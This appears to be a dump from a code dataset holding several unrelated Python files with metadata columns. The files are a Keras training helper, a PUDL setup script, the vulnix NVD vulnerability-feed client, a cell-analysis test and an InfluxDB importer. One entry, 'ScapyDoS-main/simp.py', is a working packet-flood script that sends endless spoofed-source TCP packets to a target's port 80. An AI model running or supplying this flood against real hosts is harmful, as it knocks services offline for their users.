graph_confusion_matrix(model=compiled_model, test_dataset=test,
classes=classes, path=path+"confusion_matrix.png")
def load_model(path):
model = tf.keras.models.load_model(path + "model.h5")
with open(path + "setup.json", "r") as data:
setup = json.load(data)
return model, setup["classes"]
| <filename>src/training_utils/training.py
import os
from os import path
import json
import shutil
import tensorflow as tf
import numpy as np
# Importa cosas de Keras API
from tensorflow.keras.optimizers import Adam, RMSprop
from tensorflow.keras.models import Sequential
from tensorflow.keras.utils import plot_model
# Importa callbacks del modelo
from training_utils.callbacks import TrainingCheckPoints
from tensorflow.keras.callbacks import CSVLogger, TensorBoard
# Importa cosas para graficar el entrenameinto
from training_utils.training_graphs import graph_confusion_matrix
from training_utils.training_graphs import graph_model_metrics
# Function that continues the training of a model
# Args:
# path_to_model: path were to find the model and setup
# dataset: tuple of tensorflow dataset of (train, test)
def continue_training(path_to_model, dataset):
if not path.exists(path_to_model):
print("[ERROR] El path a la carpeta del modelo no existe")
return
# carga el setup del modelo
setup = None
with open(path_to_model+"setup.json", "r") as data:
setup = json.load(data)
# carga el estado de entrenamiento
state = None
with open(path_to_model+"checkpoints/"+"training_state.json", "r") as data:
state = json.load(data)
print("[INFO] Continuando entrenameinto de modelo.")
# carga el modelo
model_name = "model_checkpoint_{}.h5".format(state["epoch"]-1)
model = tf.keras.models.load_model(path_to_model+"checkpoints/"+model_name)
# vuelve a compilar el modelo
opt = Adam(lr=state["learning_rate"])
model.compile(loss=setup["loss"], optimizer=opt, metrics=setup["metrics"])
fit_model(compiled_model=model, dataset=dataset, opt=opt,
epochs=setup["epochs"], initial_epoch=state["epoch"],
path=setup["path"], continue_train=True, classes=setup["classes"])
# Method that starts the model training
# Args:
# setup: Dictionary with the model setup
# model: the keras.Model architecture to train
# dataset: tuple of tensorflow dataset of (train, test)
def train_model(setup, model, dataset):
# Asegura que el path sea el correcto
if not path.exists(setup["path"]):
os.makedirs(setup["path"])
else:
# Borra las carpetas si ya existen
if path.exists(setup["path"]+"checkpoints"):
shutil.rmtree(setup["path"]+"checkpoints")
if path.exists(setup["path"]+"logs"):
shutil.rmtree(setup["path"]+"logs")
# crea carpeta donde se van a guardar los checkpoints
if not path.exists(setup["path"]+"checkpoints"):
os.mkdir(setup["path"] + "checkpoints")
# Escribe el setup del entrenamiento
with open(setup["path"]+"setup.json", "w") as writer:
json.dump(setup, writer, indent=4)
print("[INFO] Entrenando modelo.")
# Dibuja la arquitectura del modelo
plot_model(model, to_file=setup["path"]+"model_architecture.png",
show_shapes=True, show_layer_names=True, expand_nested=False)
# Crea optimizador, por defecto Adam
opt = Adam(lr=setup["learning_rate"])
#opt = RMSprop(lr=setup["learning_rate"])
# Compila el modelo
model.compile(loss=setup["loss"], optimizer=opt, metrics=setup["metrics"])
fit_model(compiled_model=model, dataset=dataset, opt=opt,
epochs=setup["epochs"], path=setup["path"], classes=setup["classes"])
# Metodo, que entrena un modelo ya compilado, implementa callbacks de
# tensorboard, log a un archivo CSV y creacion de checkpoints cuando ocurre
# mejoras en el loss, tambien grafica y crea matriz de confusion
# Args:
# compiled_model: keras.Model ya compilado
# dataset: tuple of tensorflow dataset of (train, test)
# opt: keras.Optimizer used in training
# epochs: The number of epochs to train
# initial_epoch: Epoch to start training, 0 for normal training
# continue_train: if the model is continuing training
# classes: array of classes that the model predict
def fit_model(compiled_model=None, # El modelo debe de estar complicado
dataset=None,
opt=None,
epochs=None,
initial_epoch=0,
path=None,
continue_train=False,
classes=None):
# obtiene el dataset
train, test = dataset
# Callbacks durante entrenamiento
relative = 0
if initial_epoch >= 1:
relative = initial_epoch
callbacks = [
#TrainingCheckPoints(path+"checkpoints/", relative_epoch=relative),
CSVLogger(path+"training_log.csv", append=continue_train),
TensorBoard(log_dir=path+"logs")
]
# Entrena el modelo
history = compiled_model.fit(train, initial_epoch=initial_epoch, epochs=epochs,
callbacks=callbacks, validation_data=test)
# Guarda el modelo
print("[INFO] Serializing model.")
compiled_model.save(path + "model.h5")
# Crea grafica del entrenamiento
graph_model_metrics(csv_path=path+"training_log.csv",
img_path=path+"metrics_graph.png")
# Crea confusion matrix
if test != None:
print("[INFO] Creando matriz de confusion")
graph_confusion_matrix(model=compiled_model, test_dataset=test,
classes=classes, path=path+"confusion_matrix.png")
def load_model(path):
model = tf.keras.models.load_model(path + "model.h5")
with open(path + "setup.json", "r") as data:
setup = json.load(data)
return model, setup["classes"]
| es | 0.357063 | # Importa cosas de Keras API # Importa callbacks del modelo # Importa cosas para graficar el entrenameinto # Function that continues the training of a model # Args: # path_to_model: path were to find the model and setup # dataset: tuple of tensorflow dataset of (train, test) # carga el setup del modelo # carga el estado de entrenamiento # carga el modelo # vuelve a compilar el modelo # Method that starts the model training # Args: # setup: Dictionary with the model setup # model: the keras.Model architecture to train # dataset: tuple of tensorflow dataset of (train, test) # Asegura que el path sea el correcto # Borra las carpetas si ya existen # crea carpeta donde se van a guardar los checkpoints # Escribe el setup del entrenamiento # Dibuja la arquitectura del modelo # Crea optimizador, por defecto Adam #opt = RMSprop(lr=setup["learning_rate"]) # Compila el modelo # Metodo, que entrena un modelo ya compilado, implementa callbacks de # tensorboard, log a un archivo CSV y creacion de checkpoints cuando ocurre # mejoras en el loss, tambien grafica y crea matriz de confusion # Args: # compiled_model: keras.Model ya compilado # dataset: tuple of tensorflow dataset of (train, test) # opt: keras.Optimizer used in training # epochs: The number of epochs to train # initial_epoch: Epoch to start training, 0 for normal training # continue_train: if the model is continuing training # classes: array of classes that the model predict # El modelo debe de estar complicado # obtiene el dataset # Callbacks durante entrenamiento #TrainingCheckPoints(path+"checkpoints/", relative_epoch=relative), # Entrena el modelo # Guarda el modelo # Crea grafica del entrenamiento # Crea confusion matrix | 2.756907 | 3 |
setup.py | truggles/pudl | 0 | 8011 | <gh_stars>0
#!/usr/bin/env python
"""Setup script to make PUDL directly installable with pip."""
import os
from pathlib import Path
from setuptools import find_packages, setup
install_requires = [
'coloredlogs',
'datapackage>=1.9.0',
'dbfread',
'goodtables',
'matplotlib',
'networkx>=2.2',
'numpy',
'pandas>=0.24',
'pyarrow>=0.14.0',
'pyyaml',
'scikit-learn>=0.20',
'scipy',
'sqlalchemy>=1.3.0',
'tableschema',
'tableschema-sql>=1.1.0',
'timezonefinder',
'xlsxwriter',
]
# We are installing the PUDL module to build the docs, but the C libraries
# required to build snappy aren't available on RTD, so we need to exclude it
# from the installed dependencies here, and mock it for import in docs/conf.py
# using the autodoc_mock_imports parameter:
if not os.getenv('READTHEDOCS'):
install_requires.append('python-snappy')
doc_requires = [
'doc8',
'sphinx',
'sphinx_rtd_theme',
]
test_requires = [
'bandit',
'coverage',
'doc8',
'flake8',
'flake8-docstrings',
'flake8-builtins',
'pep8-naming',
'pre-commit',
'pydocstyle',
'pytest',
'pytest-cov',
'nbval',
]
readme_path = Path(__file__).parent / "README.rst"
long_description = readme_path.read_text()
setup(
name='catalystcoop.pudl',
description='An open data processing pipeline for public US utility data.',
long_description=long_description,
long_description_content_type='text/x-rst',
use_scm_version=True,
author='Catalyst Cooperative',
author_email='<EMAIL>',
maintainer='<NAME>',
maintainer_email='<EMAIL>yst.coop',
url="https://catalyst.coop/pudl",
project_urls={
"Source": "https://github.com/catalyst-cooperative/pudl",
"Documentation": "https://catalystcoop-pudl.readthedocs.io",
"Issue Tracker": "https://github.com/catalyst-cooperative/pudl/issues",
},
license='MIT',
keywords=[
'electricity', 'energy', 'data', 'analysis', 'mcoe', 'climate change',
'finance', 'eia 923', 'eia 860', 'ferc', 'form 1', 'epa ampd',
'epa cems', 'coal', 'natural gas', ],
python_requires='>=3.7, <3.8.0a0',
setup_requires=['setuptools_scm'],
install_requires=install_requires,
extras_require={
"doc": doc_requires,
"test": test_requires,
},
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Console',
'Intended Audience :: Science/Research',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.7',
'Topic :: Scientific/Engineering',
],
packages=find_packages('src'),
package_dir={'': 'src'},
# package_data is data that is deployed within the python package on the
# user's system. setuptools will get whatever is listed in MANIFEST.in
include_package_data=True,
# This defines the interfaces to the command line scripts we're including:
entry_points={
'console_scripts': [
'pudl_data = pudl.workspace.datastore_cli:main',
'pudl_setup = pudl.workspace.setup_cli:main',
'pudl_etl = pudl.cli:main',
'datapkg_to_sqlite = pudl.convert.datapkg_to_sqlite:main',
'ferc1_to_sqlite = pudl.convert.ferc1_to_sqlite:main',
'epacems_to_parquet = pudl.convert.epacems_to_parquet:main',
]
},
)
| #!/usr/bin/env python
"""Setup script to make PUDL directly installable with pip."""
import os
from pathlib import Path
from setuptools import find_packages, setup
install_requires = [
'coloredlogs',
'datapackage>=1.9.0',
'dbfread',
'goodtables',
'matplotlib',
'networkx>=2.2',
'numpy',
'pandas>=0.24',
'pyarrow>=0.14.0',
'pyyaml',
'scikit-learn>=0.20',
'scipy',
'sqlalchemy>=1.3.0',
'tableschema',
'tableschema-sql>=1.1.0',
'timezonefinder',
'xlsxwriter',
]
# We are installing the PUDL module to build the docs, but the C libraries
# required to build snappy aren't available on RTD, so we need to exclude it
# from the installed dependencies here, and mock it for import in docs/conf.py
# using the autodoc_mock_imports parameter:
if not os.getenv('READTHEDOCS'):
install_requires.append('python-snappy')
doc_requires = [
'doc8',
'sphinx',
'sphinx_rtd_theme',
]
test_requires = [
'bandit',
'coverage',
'doc8',
'flake8',
'flake8-docstrings',
'flake8-builtins',
'pep8-naming',
'pre-commit',
'pydocstyle',
'pytest',
'pytest-cov',
'nbval',
]
readme_path = Path(__file__).parent / "README.rst"
long_description = readme_path.read_text()
setup(
name='catalystcoop.pudl',
description='An open data processing pipeline for public US utility data.',
long_description=long_description,
long_description_content_type='text/x-rst',
use_scm_version=True,
author='Catalyst Cooperative',
author_email='<EMAIL>',
maintainer='<NAME>',
maintainer_email='<EMAIL>yst.coop',
url="https://catalyst.coop/pudl",
project_urls={
"Source": "https://github.com/catalyst-cooperative/pudl",
"Documentation": "https://catalystcoop-pudl.readthedocs.io",
"Issue Tracker": "https://github.com/catalyst-cooperative/pudl/issues",
},
license='MIT',
keywords=[
'electricity', 'energy', 'data', 'analysis', 'mcoe', 'climate change',
'finance', 'eia 923', 'eia 860', 'ferc', 'form 1', 'epa ampd',
'epa cems', 'coal', 'natural gas', ],
python_requires='>=3.7, <3.8.0a0',
setup_requires=['setuptools_scm'],
install_requires=install_requires,
extras_require={
"doc": doc_requires,
"test": test_requires,
},
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Console',
'Intended Audience :: Science/Research',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.7',
'Topic :: Scientific/Engineering',
],
packages=find_packages('src'),
package_dir={'': 'src'},
# package_data is data that is deployed within the python package on the
# user's system. setuptools will get whatever is listed in MANIFEST.in
include_package_data=True,
# This defines the interfaces to the command line scripts we're including:
entry_points={
'console_scripts': [
'pudl_data = pudl.workspace.datastore_cli:main',
'pudl_setup = pudl.workspace.setup_cli:main',
'pudl_etl = pudl.cli:main',
'datapkg_to_sqlite = pudl.convert.datapkg_to_sqlite:main',
'ferc1_to_sqlite = pudl.convert.ferc1_to_sqlite:main',
'epacems_to_parquet = pudl.convert.epacems_to_parquet:main',
]
},
) | en | 0.861123 | #!/usr/bin/env python Setup script to make PUDL directly installable with pip. # We are installing the PUDL module to build the docs, but the C libraries # required to build snappy aren't available on RTD, so we need to exclude it # from the installed dependencies here, and mock it for import in docs/conf.py # using the autodoc_mock_imports parameter: # package_data is data that is deployed within the python package on the # user's system. setuptools will get whatever is listed in MANIFEST.in # This defines the interfaces to the command line scripts we're including: | 1.658067 | 2 |
src/vulnix/nvd.py | dermetfan/vulnix | 217 | 8012 | <filename>src/vulnix/nvd.py
from BTrees import OOBTree
from datetime import datetime, date, timedelta
from persistent import Persistent
from .vulnerability import Vulnerability
import fcntl
import glob
import gzip
import json
import logging
import os
import os.path as p
import requests
import transaction
import ZODB
import ZODB.FileStorage
DEFAULT_MIRROR = 'https://nvd.nist.gov/feeds/json/cve/1.1/'
DEFAULT_CACHE_DIR = '~/.cache/vulnix'
_log = logging.getLogger(__name__)
class NVD(object):
"""Access to the National Vulnerability Database.
https://nvd.nist.gov/
"""
def __init__(self, mirror=DEFAULT_MIRROR, cache_dir=DEFAULT_CACHE_DIR):
self.mirror = mirror.rstrip('/') + '/'
self.cache_dir = p.expanduser(cache_dir)
current = date.today().year
self.available_archives = [y for y in range(current-5, current+1)]
def lock(self):
self._lock = open(p.join(self.cache_dir, 'lock'), 'a')
try:
fcntl.lockf(self._lock, fcntl.LOCK_EX | fcntl.LOCK_NB)
except OSError:
_log.info('Waiting for NVD lock...')
fcntl.lockf(self._lock, fcntl.LOCK_EX)
def __enter__(self):
"""Keeps database connection open while in this context."""
_log.debug('Opening database in %s', self.cache_dir)
os.makedirs(self.cache_dir, exist_ok=True)
self.lock()
self._db = ZODB.DB(ZODB.FileStorage.FileStorage(
p.join(self.cache_dir, 'Data.fs')))
self._connection = self._db.open()
self._root = self._connection.root()
try:
self._root.setdefault('advisory', OOBTree.OOBTree())
self._root.setdefault('by_product', OOBTree.OOBTree())
self._root.setdefault('meta', Meta())
# may trigger exceptions if the database is inconsistent
list(self._root['by_product'].keys())
if 'archives' in self._root:
_log.warn('Pre-1.9.0 database found - rebuilding')
self.reinit()
except (TypeError, EOFError):
_log.warn('Incompatible objects found in database - rebuilding DB')
self.reinit()
return self
def __exit__(self, exc_type=None, exc_value=None, exc_tb=None):
if exc_type is None:
if self.meta.should_pack():
_log.debug('Packing database')
self._db.pack()
transaction.commit()
else:
transaction.abort()
self._connection.close()
self._db.close()
self._lock = None
def reinit(self):
"""Remove old DB and rebuild it from scratch."""
self._root = None
transaction.abort()
self._connection.close()
self._db = None
for f in glob.glob(p.join(self.cache_dir, "Data.fs*")):
os.unlink(f)
self._db = ZODB.DB(ZODB.FileStorage.FileStorage(
p.join(self.cache_dir, 'Data.fs')))
self._connection = self._db.open()
self._root = self._connection.root()
self._root['advisory'] = OOBTree.OOBTree()
self._root['by_product'] = OOBTree.OOBTree()
self._root['meta'] = Meta()
@property
def meta(self):
return self._root['meta']
def relevant_archives(self):
"""Returns list of NVD archives to check.
If there was an update within the last two hours, nothing is
done. If the last update was recent enough to be covered by
the 'modified' feed, only that is checked. Else, all feeds
are checked.
"""
last_update = self.meta.last_update
if last_update > datetime.now() - timedelta(hours=2):
return []
# the "modified" feed is sufficient if used frequently enough
if last_update > datetime.now() - timedelta(days=7):
return ['modified']
return self.available_archives
def update(self):
"""Download archives (if changed) and add CVEs to database."""
changed = []
for a in self.relevant_archives():
arch = Archive(a)
changed.append(arch.download(self.mirror, self.meta))
self.add(arch)
if any(changed):
self.meta.last_update = datetime.now()
self.reindex()
def add(self, archive):
advisories = self._root['advisory']
for (cve_id, adv) in archive.items():
advisories[cve_id] = adv
def reindex(self):
"""Regenerate product index."""
_log.info('Reindexing database')
del self._root['by_product']
bp = OOBTree.OOBTree()
for vuln in self._root['advisory'].values():
if vuln.nodes:
for prod in (n.product for n in vuln.nodes):
bp.setdefault(prod, [])
bp[prod].append(vuln)
self._root['by_product'] = bp
transaction.commit()
def by_id(self, cve_id):
"""Returns vuln or raises KeyError."""
return self._root['advisory'][cve_id]
def by_product(self, product):
"""Returns list of matching vulns or empty list."""
try:
return self._root['by_product'][product]
except KeyError:
return []
def affected(self, pname, version):
"""Returns list of matching vulnerabilities."""
res = set()
for vuln in self.by_product(pname):
if vuln.match(pname, version):
res.add(vuln)
return res
class Archive:
"""Single JSON data structure from NIST NVD."""
def __init__(self, name):
"""Creates JSON feed object.
`name` consists of a year or "modified".
"""
self.name = name
self.download_uri = 'nvdcve-1.1-{}.json.gz'.format(name)
self.advisories = {}
def download(self, mirror, meta):
"""Fetches compressed JSON data from NIST.
Nothing is done if we have already seen the same version of
the feed before.
Returns True if anything has been loaded successfully.
"""
url = mirror + self.download_uri
_log.info('Loading %s', url)
r = requests.get(url, headers=meta.headers_for(url))
r.raise_for_status()
if r.status_code == 200:
_log.debug('Loading JSON feed "%s"', self.name)
self.parse(gzip.decompress(r.content))
meta.update_headers_for(url, r.headers)
return True
else:
_log.debug('Skipping JSON feed "%s" (%s)', self.name, r.reason)
return False
def parse(self, nvd_json):
added = 0
raw = json.loads(nvd_json)
for item in raw['CVE_Items']:
try:
vuln = Vulnerability.parse(item)
self.advisories[vuln.cve_id] = vuln
added += 1
except ValueError:
_log.debug('Failed to parse NVD item: %s', item)
_log.debug("Added %s vulnerabilities", added)
def items(self):
return self.advisories.items()
class Meta(Persistent):
"""Metadate for database maintenance control"""
pack_counter = 0
last_update = datetime(1970, 1, 1)
etag = None
def should_pack(self):
self.pack_counter += 1
if self.pack_counter > 25:
self.pack_counter = 0
return True
return False
def headers_for(self, url):
"""Returns dict of additional request headers."""
if self.etag and url in self.etag:
return {'If-None-Match': self.etag[url]}
return {}
def update_headers_for(self, url, resp_headers):
"""Updates self from HTTP response headers."""
if 'ETag' in resp_headers:
if self.etag is None:
self.etag = OOBTree.OOBTree()
self.etag[url] = resp_headers['ETag']
| <filename>src/vulnix/nvd.py
from BTrees import OOBTree
from datetime import datetime, date, timedelta
from persistent import Persistent
from .vulnerability import Vulnerability
import fcntl
import glob
import gzip
import json
import logging
import os
import os.path as p
import requests
import transaction
import ZODB
import ZODB.FileStorage
DEFAULT_MIRROR = 'https://nvd.nist.gov/feeds/json/cve/1.1/'
DEFAULT_CACHE_DIR = '~/.cache/vulnix'
_log = logging.getLogger(__name__)
class NVD(object):
"""Access to the National Vulnerability Database.
https://nvd.nist.gov/
"""
def __init__(self, mirror=DEFAULT_MIRROR, cache_dir=DEFAULT_CACHE_DIR):
self.mirror = mirror.rstrip('/') + '/'
self.cache_dir = p.expanduser(cache_dir)
current = date.today().year
self.available_archives = [y for y in range(current-5, current+1)]
def lock(self):
self._lock = open(p.join(self.cache_dir, 'lock'), 'a')
try:
fcntl.lockf(self._lock, fcntl.LOCK_EX | fcntl.LOCK_NB)
except OSError:
_log.info('Waiting for NVD lock...')
fcntl.lockf(self._lock, fcntl.LOCK_EX)
def __enter__(self):
"""Keeps database connection open while in this context."""
_log.debug('Opening database in %s', self.cache_dir)
os.makedirs(self.cache_dir, exist_ok=True)
self.lock()
self._db = ZODB.DB(ZODB.FileStorage.FileStorage(
p.join(self.cache_dir, 'Data.fs')))
self._connection = self._db.open()
self._root = self._connection.root()
try:
self._root.setdefault('advisory', OOBTree.OOBTree())
self._root.setdefault('by_product', OOBTree.OOBTree())
self._root.setdefault('meta', Meta())
# may trigger exceptions if the database is inconsistent
list(self._root['by_product'].keys())
if 'archives' in self._root:
_log.warn('Pre-1.9.0 database found - rebuilding')
self.reinit()
except (TypeError, EOFError):
_log.warn('Incompatible objects found in database - rebuilding DB')
self.reinit()
return self
def __exit__(self, exc_type=None, exc_value=None, exc_tb=None):
if exc_type is None:
if self.meta.should_pack():
_log.debug('Packing database')
self._db.pack()
transaction.commit()
else:
transaction.abort()
self._connection.close()
self._db.close()
self._lock = None
def reinit(self):
"""Remove old DB and rebuild it from scratch."""
self._root = None
transaction.abort()
self._connection.close()
self._db = None
for f in glob.glob(p.join(self.cache_dir, "Data.fs*")):
os.unlink(f)
self._db = ZODB.DB(ZODB.FileStorage.FileStorage(
p.join(self.cache_dir, 'Data.fs')))
self._connection = self._db.open()
self._root = self._connection.root()
self._root['advisory'] = OOBTree.OOBTree()
self._root['by_product'] = OOBTree.OOBTree()
self._root['meta'] = Meta()
@property
def meta(self):
return self._root['meta']
def relevant_archives(self):
"""Returns list of NVD archives to check.
If there was an update within the last two hours, nothing is
done. If the last update was recent enough to be covered by
the 'modified' feed, only that is checked. Else, all feeds
are checked.
"""
last_update = self.meta.last_update
if last_update > datetime.now() - timedelta(hours=2):
return []
# the "modified" feed is sufficient if used frequently enough
if last_update > datetime.now() - timedelta(days=7):
return ['modified']
return self.available_archives
def update(self):
"""Download archives (if changed) and add CVEs to database."""
changed = []
for a in self.relevant_archives():
arch = Archive(a)
changed.append(arch.download(self.mirror, self.meta))
self.add(arch)
if any(changed):
self.meta.last_update = datetime.now()
self.reindex()
def add(self, archive):
advisories = self._root['advisory']
for (cve_id, adv) in archive.items():
advisories[cve_id] = adv
def reindex(self):
"""Regenerate product index."""
_log.info('Reindexing database')
del self._root['by_product']
bp = OOBTree.OOBTree()
for vuln in self._root['advisory'].values():
if vuln.nodes:
for prod in (n.product for n in vuln.nodes):
bp.setdefault(prod, [])
bp[prod].append(vuln)
self._root['by_product'] = bp
transaction.commit()
def by_id(self, cve_id):
"""Returns vuln or raises KeyError."""
return self._root['advisory'][cve_id]
def by_product(self, product):
"""Returns list of matching vulns or empty list."""
try:
return self._root['by_product'][product]
except KeyError:
return []
def affected(self, pname, version):
"""Returns list of matching vulnerabilities."""
res = set()
for vuln in self.by_product(pname):
if vuln.match(pname, version):
res.add(vuln)
return res
class Archive:
"""Single JSON data structure from NIST NVD."""
def __init__(self, name):
"""Creates JSON feed object.
`name` consists of a year or "modified".
"""
self.name = name
self.download_uri = 'nvdcve-1.1-{}.json.gz'.format(name)
self.advisories = {}
def download(self, mirror, meta):
"""Fetches compressed JSON data from NIST.
Nothing is done if we have already seen the same version of
the feed before.
Returns True if anything has been loaded successfully.
"""
url = mirror + self.download_uri
_log.info('Loading %s', url)
r = requests.get(url, headers=meta.headers_for(url))
r.raise_for_status()
if r.status_code == 200:
_log.debug('Loading JSON feed "%s"', self.name)
self.parse(gzip.decompress(r.content))
meta.update_headers_for(url, r.headers)
return True
else:
_log.debug('Skipping JSON feed "%s" (%s)', self.name, r.reason)
return False
def parse(self, nvd_json):
added = 0
raw = json.loads(nvd_json)
for item in raw['CVE_Items']:
try:
vuln = Vulnerability.parse(item)
self.advisories[vuln.cve_id] = vuln
added += 1
except ValueError:
_log.debug('Failed to parse NVD item: %s', item)
_log.debug("Added %s vulnerabilities", added)
def items(self):
return self.advisories.items()
class Meta(Persistent):
"""Metadate for database maintenance control"""
pack_counter = 0
last_update = datetime(1970, 1, 1)
etag = None
def should_pack(self):
self.pack_counter += 1
if self.pack_counter > 25:
self.pack_counter = 0
return True
return False
def headers_for(self, url):
"""Returns dict of additional request headers."""
if self.etag and url in self.etag:
return {'If-None-Match': self.etag[url]}
return {}
def update_headers_for(self, url, resp_headers):
"""Updates self from HTTP response headers."""
if 'ETag' in resp_headers:
if self.etag is None:
self.etag = OOBTree.OOBTree()
self.etag[url] = resp_headers['ETag']
| en | 0.878714 | Access to the National Vulnerability Database. https://nvd.nist.gov/ Keeps database connection open while in this context. # may trigger exceptions if the database is inconsistent Remove old DB and rebuild it from scratch. Returns list of NVD archives to check. If there was an update within the last two hours, nothing is done. If the last update was recent enough to be covered by the 'modified' feed, only that is checked. Else, all feeds are checked. # the "modified" feed is sufficient if used frequently enough Download archives (if changed) and add CVEs to database. Regenerate product index. Returns vuln or raises KeyError. Returns list of matching vulns or empty list. Returns list of matching vulnerabilities. Single JSON data structure from NIST NVD. Creates JSON feed object. `name` consists of a year or "modified". Fetches compressed JSON data from NIST. Nothing is done if we have already seen the same version of the feed before. Returns True if anything has been loaded successfully. Metadate for database maintenance control Returns dict of additional request headers. Updates self from HTTP response headers. | 2.230697 | 2 |
ScapyDoS-main/simp.py | Zusyaku/Termux-And-Lali-Linux-V2 | 2 | 8013 | from scapy.all import *
src = input("Source IP: ")
target = input("Target IP: ")
i=1
while True:
for srcport in range(1, 65535):
ip = IP(src=src, dst=target)
tcp = TCP(sport=srcport, dport=80)
pkt = ip / tcp
send(pkt, inter= .0001)
print("Packet Sent ", i)
i=i+1 | from scapy.all import *
src = input("Source IP: ")
target = input("Target IP: ")
i=1
while True:
for srcport in range(1, 65535):
ip = IP(src=src, dst=target)
tcp = TCP(sport=srcport, dport=80)
pkt = ip / tcp
send(pkt, inter= .0001)
print("Packet Sent ", i)
i=i+1 | none | 1 | 2.934474 | 3 |
|
test/test_basic_functions.py | azagajewski/ColiCoords | 18 | 8014 | import hashlib
import unittest
from colicoords.cell import Cell, CellList
from colicoords.preprocess import data_to_cells
from test import testcase
from test.test_functions import load_testdata
class DataTest(testcase.ArrayTestCase):
def setUp(self):
self.data = load_testdata('ds1')
def test_data_slicing(self):
sl1 = self.data[2:5, :, :]
self.assertEqual(sl1.shape, (3, 512, 512))
sl2 = self.data[:, 20:40, 100:200]
self.assertEqual(sl2.shape, (10, 20, 100))
def test_data_copy(self):
m0 = self.data.binary_img.mean()
data_copy = self.data.copy()
self.assertEqual(m0, self.data.binary_img.mean())
data_copy.data_dict['binary'] += 20
self.assertEqual(m0, self.data.binary_img.mean())
self.assertEqual(data_copy.binary_img.mean(), m0 + 20)
def _test_cell_list(self):
#todo check order
print(hashlib.md5(self.data).hexdigest())
cell_list = data_to_cells(self.data, initial_crop=2, cell_frac=0.5, rotate='binary')
print(hashlib.md5(self.data).hexdigest())
cell_list = data_to_cells(self.data, initial_crop=2, cell_frac=0.5, rotate='binary')
print(hashlib.md5(self.data).hexdigest())
d = self.data.copy()
print(d == self.data)
cl = CellList(cell_list)
self.assertEqual(len(cl), 48)
c5 = cl[5]
self.assertIsInstance(c5, Cell)
del cl[5]
self.assertEqual(len(cl), 47)
self.assertTrue(cl[3] in cl)
cl.append(c5)
self.assertTrue(c5 in cl)
vol = cl.volume
self.assertEqual(len(vol), 48)
class CellListTest(testcase.ArrayTestCase):
def setUp(self):
data = load_testdata('ds1')
self.cell_list = data_to_cells(data)
def test_slicing(self):
sliced = self.cell_list[:5]
self.assertIsInstance(sliced, CellList)
if __name__ == '__main__':
unittest.main() | import hashlib
import unittest
from colicoords.cell import Cell, CellList
from colicoords.preprocess import data_to_cells
from test import testcase
from test.test_functions import load_testdata
class DataTest(testcase.ArrayTestCase):
def setUp(self):
self.data = load_testdata('ds1')
def test_data_slicing(self):
sl1 = self.data[2:5, :, :]
self.assertEqual(sl1.shape, (3, 512, 512))
sl2 = self.data[:, 20:40, 100:200]
self.assertEqual(sl2.shape, (10, 20, 100))
def test_data_copy(self):
m0 = self.data.binary_img.mean()
data_copy = self.data.copy()
self.assertEqual(m0, self.data.binary_img.mean())
data_copy.data_dict['binary'] += 20
self.assertEqual(m0, self.data.binary_img.mean())
self.assertEqual(data_copy.binary_img.mean(), m0 + 20)
def _test_cell_list(self):
#todo check order
print(hashlib.md5(self.data).hexdigest())
cell_list = data_to_cells(self.data, initial_crop=2, cell_frac=0.5, rotate='binary')
print(hashlib.md5(self.data).hexdigest())
cell_list = data_to_cells(self.data, initial_crop=2, cell_frac=0.5, rotate='binary')
print(hashlib.md5(self.data).hexdigest())
d = self.data.copy()
print(d == self.data)
cl = CellList(cell_list)
self.assertEqual(len(cl), 48)
c5 = cl[5]
self.assertIsInstance(c5, Cell)
del cl[5]
self.assertEqual(len(cl), 47)
self.assertTrue(cl[3] in cl)
cl.append(c5)
self.assertTrue(c5 in cl)
vol = cl.volume
self.assertEqual(len(vol), 48)
class CellListTest(testcase.ArrayTestCase):
def setUp(self):
data = load_testdata('ds1')
self.cell_list = data_to_cells(data)
def test_slicing(self):
sliced = self.cell_list[:5]
self.assertIsInstance(sliced, CellList)
if __name__ == '__main__':
unittest.main() | en | 0.379612 | #todo check order | 2.557771 | 3 |
data_importer_ftp.py | supsi-dacd-isaac/oasi-ozone-forecaster | 0 | 8015 | # --------------------------------------------------------------------------- #
# Importing section
# --------------------------------------------------------------------------- #
import os
import sys
import argparse
import logging
import json
from classes.alerts import SlackClient
from influxdb import InfluxDBClient
from classes.data_manager import DataManager
# --------------------------------------------------------------------------- #
# Functions
# -----------------------------------------------------------------------------#
def slack_msg():
slack_client = SlackClient(logger, cfg)
if bool(dm.files_not_correctly_handled):
str_err = ''
for k in dm.files_not_correctly_handled:
str_err = '%sFailed handling of file %s; Exception: %s\n' % (str_err, k, dm.files_not_correctly_handled[k])
slack_client.send_alert_message('OZONE FORECASTER - RAW FILES ALARM:\n%s' % str_err, '#ff0000')
else:
slack_client.send_alert_message('OZONE FORECASTER - RAW FILES PROPERLY HANDLED', '#00ff00')
# --------------------------------------------------------------------------- #
# Main
# --------------------------------------------------------------------------- #
if __name__ == "__main__":
# --------------------------------------------------------------------------- #
# Configuration file
# --------------------------------------------------------------------------- #
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument("-c", help="configuration file")
arg_parser.add_argument("-l", help="log file (optional, if empty log redirected on stdout)")
args = arg_parser.parse_args()
config_file = args.c
if os.path.isfile(config_file) is False:
print('\nATTENTION! Unable to open configuration file %s\n' % config_file)
sys.exit(1)
cfg = json.loads(open(args.c).read())
conns_cfg = json.loads(open(cfg['connectionsFile']).read())
cfg.update(conns_cfg)
# --------------------------------------------------------------------------- #
# Set logging object
# --------------------------------------------------------------------------- #
if not args.l:
log_file = None
else:
log_file = args.l
logger = logging.getLogger()
logging.basicConfig(format='%(asctime)-15s::%(levelname)s::%(funcName)s::%(message)s', level=logging.INFO,
filename=log_file)
# --------------------------------------------------------------------------- #
# Starting program
# --------------------------------------------------------------------------- #
logger.info("Starting program")
# --------------------------------------------------------------------------- #
# InfluxDB connection
# --------------------------------------------------------------------------- #
logger.info('Connection to InfluxDb server on socket [%s:%s]' % (cfg['influxDB']['host'], cfg['influxDB']['port']))
try:
influx_client = InfluxDBClient(host=cfg['influxDB']['host'], port=cfg['influxDB']['port'],
password=cfg['influxDB']['password'], username=cfg['influxDB']['user'],
database=cfg['influxDB']['database'], ssl=cfg['influxDB']['ssl'])
except Exception as e:
logger.error('EXCEPTION: %s' % str(e))
sys.exit(3)
logger.info('Connection successful')
